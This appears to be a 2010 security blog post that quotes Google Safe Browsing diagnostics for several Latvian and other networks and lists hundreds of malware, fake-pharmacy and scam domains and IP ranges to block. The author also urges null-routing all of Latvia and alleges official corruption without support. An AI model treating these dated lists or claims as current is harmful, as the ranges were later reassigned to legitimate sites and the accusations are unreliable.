Safe Browsing
Diagnostic page for AS29557 (ASNOVIFORUM)

What happened when Google visited sites hosted on this network?

    Of the 42 site(s) we tested on this network over the past 90 days, 2 site(s), including, for example, fastprosearch.com/, twilightsex.cz.cc/, served content that resulted in malicious software being downloaded and installed without user consent.

    The last time Google tested a site on this network was on 2010-10-10, and the last time suspicious content was found was on 2010-10-10.

Has this network hosted sites acting as intermediaries for further malware distribution?

    Over the past 90 days, we found 10 site(s) on this network, including, for example, manoso.cz.cc/, noaos1.cz.cc/, sunporno.cz.cc/, that appeared to function as intermediaries for the infection of 31 other site(s) including, for example, business-standard.com/, ddl-blog.org/, onlyteensx.net/.

Has this network hosted sites that have distributed malware?

    Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 22 site(s), including, for example, 194.8.251.0/, prostodomen.in/, globalvalidator.cz.cc/, that infected 215 other site(s), including, for example, business-standard.com/, renisyqaqir.freehostking.com/, hetivilesum.freehostking.com/.

A search against MyWOT reputations reveals a concentration of very bad sites (report here), the best thing to do is to block all traffic to 194.8.250.0 - 194.8.251.255 (194.8.250.0/23) and/or the domains listed below:

Girlongirllibido.info
Homeownersinsuranceratings.com
Testertestfree.org
Vmhostingboxx.org
Dscodec.com
Fastprosearch.com
Ttyur.com
Vlopw.com
Bmlsk.com
Bumzc.com
Fjoty.com
Fruuf.com
Hjoty.com
Nwsplt.com
Palcaug.com
Potyur.com
Uoptyr.com
Uprtx.com
Medicpillsana.com
Medicpillsbba.com
Medicpillsbia.com
Medicpillsbta.com
Medicpillscaa.com
Medicpillscea.com
Medicpillscha.com
Medicpillscia.com
Medicpillscka.com
Medicshopnas.net
Medicshopnds.net
Medicshopnks.net
Medicshopnts.net
Medicshopoes.net
Asemedic.net
Astmedic.net
Encmedic.net
Enmedic.net
Frmedic.net
Hismedic.net
Icmedic.net
Intmedic.net
Krmedic.net
Letmedic.net
Medicci.net
Medicdi.net
Medicfr.net
Medicha.net
Mediclg.net
Medicni.net
Medicnr.net
Medicpo.net
Medicpu.net
Medicri.net
Ajeslovshord.com
Akvodhhead.com
Alsodhesedhoujhd.com
Aniarioli.com
Askpressjame.com
Bejokohafder.com
Blackmodhersdep.com
Bodhlearkfil.com
Busyplakdovk.com
Cutyacttin.com
Deheverbejak.com
Dhadhaveopek.com
Dheyherevhole.com
Dovkbackbord.com
Fallanlot.com
Gavilaugddiri.com
Hadakcourse.com
Hojharedokd.com
Kameuspoukd.com
Losdsodemoss.com
Lovioinwdoli.com
Medpillsna1.com
Medpillsna2.com
Medpillsna3.com
Medpillsna4.com
Medpillsna5.com
Medpillsni1.com
Medpillsni2.com
Medpillsni3.com
Medpillsni4.com
Medpillsni5.com
Minanwaut.com
Offobjecdfamoly.com
Okchfudboy.com
Oslakdexampleas.com
Pajeukdolmaok.com
Posekipbrokj.com
Pukdraokclass.com
Redovksay.com
Resdlaujhmoss.com
Savsdadeschul.com
Sduigancdangi.com
Sliicrymuli.com
Stooddandwi.com
Suchjrikoh.com
Travilfuriwdin.com
Addsecovdtook.com
Aoutdonttdrii.com
Assiafull.com
Commoklakjuajemeak.com
Dalkplakdaor.com
Deachhodkear.com
Dhadledad.com
Dhohdhokjearly.com
Dhokjbroujhdmusd.com
Dojcourseleark.com
Domesdopdhousakd.com
Dopmedic.net
Dovardhohdhoh.com
Efimedic.net
Enemedic.net
Feetdoldakayvst.com
Femedic.net
Hamedic.net
Joldiplosd.com
Kodocedoldappear.com
Launflymost.com
Lederbojdhad.com
Letdourwere.com
Lodledellmek.com
Medshopcu1.com
Medshopcu2.com
Medshopcu3.com
Medshopcu4.com
Medshopcu5.com
Medshopde1.com
Medshopde2.com
Medshopde3.com
Medshopde4.com
Medshopde5.com
Muchplakdokly.com
Okcevhekvadch.com
Oldbesdjrik.com
Passourdu.com
Pocdurejudcold.com
Rockdomeacd.com
Rockroundsung.com
Sicondkniwgo.com
Slovkevvell.com
Soldmarkacte.com
Strovkuproad.com
Ukmedicineel.com
Ukmedicineho.com
Ukmedicineit.com
Vadchdeachmokd.com
Vekdhadjrov.com
Vhadreachmusoc.com
Vholevucemay.com
Vokdercarryjod.com
Vordeachsdud.com
Ydeamavturv.com
Advsecsmart.com
Digitall-soft.com
Extrafullprotection.com
Mypc-repair.com
Payforsec.com
Secsmartsuper.com
Smartsecadv.com
Smartsecsuper.com
Smartsecurityadvisor.com
Smartsupersecurity.com
Stable-soft.com
Supersecadvizor.com
Supersecurepay.com
Supersmartantivirus.com
Supersmartsec.com
Bbnhs.com
Bumzec.com
Ddleb.com
Drutp.com
Gasdda.com
Gradtz.com
Hewraq.com
Hgptd.com
Htresq.com
Krclear.com
Nadwq.com
Nmkop.com
Utrvc.com
Vbnrte.info
Kobqq.com
Jgtee.com
Jyiop.com
Mptim.com
Nhytx.com
Ptyre.com
Woptr.com
Yopte.com
Ypuii.com
Checkingassociateeditor.com
Bestcheckingconnect.com
Checking-associate-editor.com
Checking-associate.com
Checkingassociatemembership.com
Checkingconnectdata.com
Checkingconnectnow.com
Checkingconnectshop.com
Cogus.net
Gromz.net
Mochos.net
Zorter.net
Movies-celeb.info
Onlymoviesporn.info
Porn-video-4u.info
Pornyardmovies.info
Videostreamporn.info
Moviesfreestar.info
Nanocloudcontroller.com
Iliked.org
Yougoodvideo.net
Shloesandrooneys.com
1200kb.net
Banfieldsbest.com
Btp-tags.com
Doit-4-u.com
In-ta.net
Media-share.org
Mwcdirect.com
Pixel-pie.com
Planetsoldat.com
Sainser.com
Wnizip.com
Dsfungssdfg.com
Sbgfdfsggf.com
Sportstickets.tv
Sufdngsg.com
Missing-codecs.com
Missing-codecs.net
Missing-codecs.org
Vidscentral.net
Consp.net
Thestability.com
Traffcity.com
Polytech-electronics.net
Blackmaven.in
Blueace.in
Whiteace.in
Whiteoso.in
Whitewizard.in
Globalcloudbackup.com

Evil network: Sagade Ltd / ATECH-SAGADE AS6851 (85.234.190.0/23)

I've mentioned Sagade Ltd before, it's a totally Black Hat Latvian network that should be blocked on sight. Google's Safe Browsing diagnostic for this range is fairly damning:

Has this site acted as an intermediary resulting in further distribution of malware?

    Over the past 90 days, 85.234.190.0 appeared to function as an intermediary for the infection of 476 site(s) including lekarnar.com/, mysofa.es/, audiofile.org.ua/.

Has this site hosted malware?

    Yes, this site has hosted malicious software over the past 90 days. It infected 1999 domain(s), including audiofile.org.ua/, votailprof.it/, capinaremos.com/.

There's very little point playing whack-a-mole with these Latvian IP addresses. It's probably worth null-routing the entire country until some government agency that isn't being paid off by Russian organised criminals sorts the mess out. There's a list of major Latvian IP address allocations here- unless you do business in the Baltic states, then blocking all of them will probably do no harm.

Domains in the IP address range 85.234.190.0 - 85.234.191.255 are:
Marre.in
Monre.in
Sdaya.in
Dnsdnsprovider.com
Respw.info
Tonew.info
Wbypa.info
Celebsalon.net
Celebsvideos.net
Soltberger.net
Sumerki-saga.com
Zatmenie-saga.com
Bestgoogleanalytics.com
Bestgenerics.org
Dhag.org
Autoseon7.com
Auou.info
Premiaa.com
Tdyeah.com
Oeema.info
Oeeme.info
Toptrep.biz
Staticdnsdns.com
Aaasphereezine.com
Aopsompamspn.com
Hsudsasodams.com
Ieksmanskasdk.com
Mopsdiamsas.com
Alert-system.net
Ffgde.com
Gdlka.com
Khhfg.com
Nnmty.com
Ppolr.com
Rcchr.com
Rrtyu.com
Rttye.com
Trrre.com
Uyyty.com
Ccdfr.com
Ffeeq.com
Kklou.com
Kkuyt.com
Oouty.com
Ppuut.com
Ppyur.com
Ttyww.com
Wrraa.com
Yyrew.com
Bbhty.com
Ggbdb.com
Rggsd.com
Rihdd.com
Rrryu.com
Bbgtr.com
Kjhtr.com
Wrrrt.com
Mylote.com
Tube-free-online.com
Adminka.org
Bbcxq.com
Bnfgd.com
Cbdfr.com
Dettt.com
Fggpr.com
Ggffr.com
Hhyyr.com
Ssmmb.com
Trdvr.com
Darkseo.org
Dbsoft.in
Domainpc.in
Exinfo.in
Lightdebug.in
Microsoft-security-center.com
Mxinfo.in
Statreview.in
Uimode.in
Unport.in
Bestdomainforus.info
Bestvido.info
Bluffycrob.info
Domain-for-email-us.info
Domain-for-gain-us.info
Domain-for-lease-us.info
Domain-for-us.info
Domainfordollarsus.info
Domainforemailus.info
Domainforgainus.info
Domainforleaseus.info
Domainforus.info
Domainforusblog.info
Domainforusnow.info
Domainforusonline.info
Domainforusshop.info
Domainforussite.info
Domainforusstore.info
Domainforustoday.info
Fffvideo.info
Freedomainforus.info
Freevido.info
Microoplata.info
Moplata.info
Mydomainforus.info
Myvido.info
Newdomainforus.info
Newvido.info
Stupid-domain-for-us.info
Stupiddomainforus.info
Thebluffycrob.info
Thedomainforus.info
Thefffvideo.info
Vi-do.info
Vidonow.info
Vidoonline.info

Evil network: Latnet Serviss Ltd (latnet.lv) AS2588 (159.148.117.0/24)

Latvia is definitely becoming a problem when it comes to black hat hosting. The 159.148.117.0/24 range (159.148.117.0 - 159.148.117.255) is another malicious block, forming part of AS2588 belonging to Latnet (similar to microlines.lv). At a rough calculation, roughly half the IP address ranges I am currently blocking are based in Latvia.

This bunch of domains is a mix of fake pharma sites, browser exploits, illegal downloads and possibly some hijacked domains. In any case, there is nothing of use here and either blocking the entire IP range, or the list below is probably a good idea.

There's a more detailed file with MyWOT ratings and IP addresses to download here.

Bitssit.com
Solid-pay-gate.com
Bombastats.com
1001meds.info
101doctors.info
101health.info
11doctors.info
333tabs.info
5meds.info
911drugs.info
99pharmacy.info
99pills.info
Abouttabs.info
Actualdrugs.info
Actualtabs.info
Addhealth.info
Addpills.info
Advancedsoft.in
Allpills.info
Anyhealth.info
Anymeds.info
Anytabs.info
Atlanticdrugs.info
Atlantictabs.info
Bestwesthost.info
Bluedoctor.info
Buycheapnow3.info
Buyfdatabs.info
Buygeneric1.info
Buyld.info
Buyonline5.info
Buytramadol5.info
Buytramadolf.info
Buytramadolk.info
Buytramadolp.info
Buytramadolt.info
Buytramadoly.info
Buyxanax1.info
Buyxanaxk.info
Cheap2tramadol.info
Cheaponline2.info
Cheaprt.info
Cheaptramadolh.info
Cheaptramadoli.info
Cheaptramadolss.info
Cheaptramadolw.info
Cheaptramadolz.info
Cheapxanaxz.info
Doctor01.info
Doctorarea.info
Doctordaily.info
Doctorgiant.info
Doctorjones.info
Dogoal.in
Drugs01.info
Drugs12.info
Drugsapple.info
Drugsbasket.info
Drugsblue.info
Drugscenter.info
Drugsclub.info
Drugscompany.info
Drugsdaily.info
Drugsfast.info
Drugsgood.info
Drugslife.info
Drugsreview.info
Drugstoree.info
Fasttabs.info
Fdapillsonline.info
Fulink.in
Fustat.in
Generictramadolb.info
Generictramadolc.info
Generictramadoln.info
Generictramadolr.info
Generictramadolv.info
Genericxanaxn.info
Getonlinehealth.info
Getonlinemeds.info
Haycorn.info
Health911.info
Healthbasket.info
Healthblue.info
Healthgreat.info
Healthlabel.info
Kinghealth.info
Kingpills.info
Knownmeds.info
Knowntabs.info
Labeldrugs.info
Labelhealth.info
Meds01.info
Meds333.info
Meds4him.info
Medsapple.info
Medsarea.info
Medsdaily.info
Medsexpress.info
Medsguard.info
Medshealth.info
Medslife.info
Medslocate.info
Medssearch.info
Mmlist.in
Mmsoft.in
Moderndrugs.info
Modernpills.info
Mxstat.in
Needsdoctor.info
Olstat.in
Online01.info
Onlinecasinosbestusa.info
Onlineow.info
Ordercheapnow6.info
Orderoj.info
Orderonline4.info
Ordertramadold.info
Ordertramadole.info
Ordertramadolj.info
Ordertramadolo.info
Ordertramadolx.info
Orderxanaxx.info
Owndoctor.info
Pacificdoctor.info
Pills007.info
Pills01.info
Pills4him.info
Pills4men.info
Pillsaccept.info
Pillsarea.info
Pillsblue.info
Pillscontrol.info
Pillsdaily.info
Pillsfast.info
Pillsgood.info
Pillslabel.info
Pillslife.info
Pillslocate.info
Pillsoffice.info
Pillsreview.info
Pillssearch.info
Pillstoday.info
Pillsworld.info
Realtabs.info
Rx999.info
Safedoctor.info
Searchtabs.info
Sermyagino.info
Ssmode.in
Ssnews.in
Tabs01.info
Tabs4him.info
Tabs5.info
Tabsaccept.info
Tabsapple.info
Tabsarea.info
Tabscenter.info
Tabsclub.info
Tabscompany.info
Tabscontrol.info
Tabsdaily.info
Tabsexpress.info
Tabsguard.info
Tabsguide.info
Tabslife.info
Tabsoffice.info
Tabspills.info
Tabsreview.info
Tabssearch.info
Tabsworld.info
Todaypills.info
Todaytabs.info
Tramadolonline7.info
Tramadolonlinea.info
Tramadolonlineg.info
Tramadolonlinel.info
Tramadolonlineq.info
Tramadolonlineu.info
Tramadoltramadol1.info
Tramadoltramadol10.info
Tramadoltramadol2.info
Tramadoltramadol3.info
Tramadoltramadol4.info
Tramadoltramadol5.info
Tramadoltramadol6.info
Tramadoltramadol7.info
Tramadoltramadol8.info
Tramadoltramadol9.info
Uiplus.in
Usaapharm.info
Usausaonlinecasinossuper.info
Xanaxonlinee.info
Xanaxonlinel.info
Pupseg.net
Pupseg.org
Pixelstatservice.com
Mybesttubeporn.com
Rowfirst.com
Java-9update.com
Update-00server.com
Hqll.ru
Xacz.ru
Aloa.asia
Vniz.asia
Bbls.ru
Vaseagruzitkorm.com
Vaseajretikru.com
Ewacx.com
Yacver.com
Security-defencing.com
Mypctech.net
1200kb.net
Banfieldsbest.com
Btp-tags.com
Doit-4-u.com
In-ta.net
Media-share.org
Mwcdirect.com
Pixel-pie.com
Planetsoldat.com
Sainser.com
Wnizip.com
Thebestporn.in
Cormoupo.info
Zombie-world.org
Alterparadigma.net
Brickplayer.ru
Chilauter.ru
Compromendes.com
Moretds.org
Danjg.com
Aftui.in
Ammew.info
Armrm.in
Aspow.info
Clasd.in
Coerw.info
Demim.in
Diasw.info
Diaui.in
Expew.info
Eynew.info
Gatui.in
Harui.in
Highw.info
Homow.in
Jenyx.in
Jusui.in
Katre.in
Lisni.in
Manui.in
Marsw.in
Marui.in
Micre.in
Neigw.info
Ningl.in
Nitan.in
Nvenc.in
Nvene.in
Nvild.in
Nvill.in
Pockw.info
Praaw.info
Pulpm.in
Racew.info
Recei.in
Recky.in
Recto.in
Regaw.info
Rendm.in
Sepsd.in
Slovw.in
Socyx.in
Stpsd.in
Synre.in
Thiui.in
Torsw.in
Uianh.in
Volnv.in
Yxiac.in
California-ns.com

UPDATE 2014-06-25:  It's been a long time since I wrote this, and it looks like the block was cleaned up some time ago and now contains some Latvian government sites.